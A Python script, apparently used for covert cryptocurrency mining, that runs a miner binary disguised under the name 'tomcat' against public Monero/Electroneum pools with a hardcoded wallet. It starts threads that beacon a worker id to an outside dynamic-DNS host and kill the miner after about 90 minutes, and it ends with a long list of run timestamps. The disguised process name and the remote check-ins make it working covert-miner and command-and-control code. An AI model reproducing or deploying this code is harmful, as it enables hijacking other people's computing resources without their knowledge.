import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:01.983742
#2018-02-17 17:19:01.544438
#2018-02-17 19:07:05.907797
#2018-02-17 20:54:05.404126
#2018-02-17 22:41:05.686532
#2018-02-18 00:24:07.387852
#2018-02-18 02:15:04.360927
#2018-02-18 04:04:01.272838
#2018-02-18 05:54:07.313463
#2018-02-18 07:45:01.462071
#2018-02-18 09:32:03.458054
#2018-02-18 11:18:02.160845
#2018-02-18 13:04:01.862729
#2018-02-18 14:53:06.481492
#2018-02-18 16:40:05.517764
#2018-02-18 18:29:04.903208
#2018-02-18 20:17:01.417836
#2018-02-18 22:02:01.661609
#2018-02-18 23:50:08.536564
#2018-02-19 01:36:01.617153
#2018-02-19 03:24:02.216315
#2018-02-19 05:09:04.387630
#2018-02-19 06:56:03.559453
#2018-02-19 08:45:02.676985
#2018-02-19 10:33:04.167734
#2018-02-19 12:22:08.250449
#2018-02-19 14:10:06.917236
#2018-02-19 15:58:08.554002
#2018-02-19 17:47:01.700476
#2018-02-19 19:35:08.030975
#2018-02-19 21:23:04.884275
#2018-02-19 23:09:04.964880
#2018-02-20 00:53:05.262919
#2018-02-20 02:42:01.455780
#2018-02-20 04:31:01.630114
#2018-02-20 06:15:05.599516
#2018-02-20 08:01:04.846546
#2018-02-20 09:46:01.348105
#2018-02-20 11:30:05.695294
#2018-02-20 13:18:07.560150
#2018-02-20 15:04:10.560872
#2018-02-20 16:48:07.319112
#2018-02-20 18:35:10.098236
#2018-02-20 20:25:09.632273
#2018-02-20 22:12:07.949432
#2018-02-20 23:53:04.330716
#2018-02-21 01:37:08.488080
#2018-02-21 03:26:06.931046
#2018-02-21 05:15:06.925584
#2018-02-21 07:04:06.990204
#2018-02-21 08:50:02.800105
#2018-02-21 10:37:02.172440
#2018-02-21 12:25:10.015118
#2018-02-21 14:12:10.159518
#2018-02-21 15:59:07.149452
#2018-02-21 17:51:10.729333
#2018-02-21 19:38:05.488448
#2018-02-21 21:26:04.467134
#2018-02-21 23:12:05.811895
#2018-02-22 01:02:01.528477
#2018-02-22 02:49:03.722815
#2018-02-22 04:35:07.144178
#2018-02-22 06:20:03.644337
#2018-02-22 08:07:05.124396
#2018-02-22 09:54:06.466038
#2018-02-22 11:39:08.255345
#2018-02-22 13:27:05.622038
#2018-02-22 15:16:08.571131
#2018-02-22 16:59:08.918141
#2018-02-22 18:47:09.876522
#2018-02-22 20:38:07.167035
#2018-02-22 22:23:08.329798
#2018-02-23 00:12:01.388934
#2018-02-23 02:02:01.484090
#2018-02-23 03:50:01.573676
#2018-02-23 05:42:05.516174
#2018-02-23 07:27:04.599228
#2018-02-23 09:33:01.580337
#2018-02-23 11:39:08.755192
#2018-02-23 13:29:05.825240
#2018-02-23 15:16:05.192630
#2018-02-23 17:04:01.801672
#2018-02-23 18:53:06.232981
#2018-02-23 20:41:01.278194
#2018-02-23 22:26:07.306160
#2018-02-24 00:13:07.261436
#2018-02-24 02:05:01.984988
#2018-02-24 03:36:06.680438
#2018-02-24 05:11:03.625915
#2018-02-24 06:41:05.825862
#2018-02-24 08:18:06.633499
#2018-02-24 09:48:01.696790
#2018-02-24 11:33:06.278891
#2018-02-24 12:59:04.818238
#2018-02-24 14:33:01.674326
#2018-02-24 16:03:05.485577
#2018-02-24 17:45:08.820073
#2018-02-24 19:15:04.202769
#2018-02-24 20:48:07.656948
#2018-02-24 22:36:01.950570
#2018-02-25 01:04:07.109052
#2018-02-25 02:59:07.318843
#2018-02-25 06:54:01.267460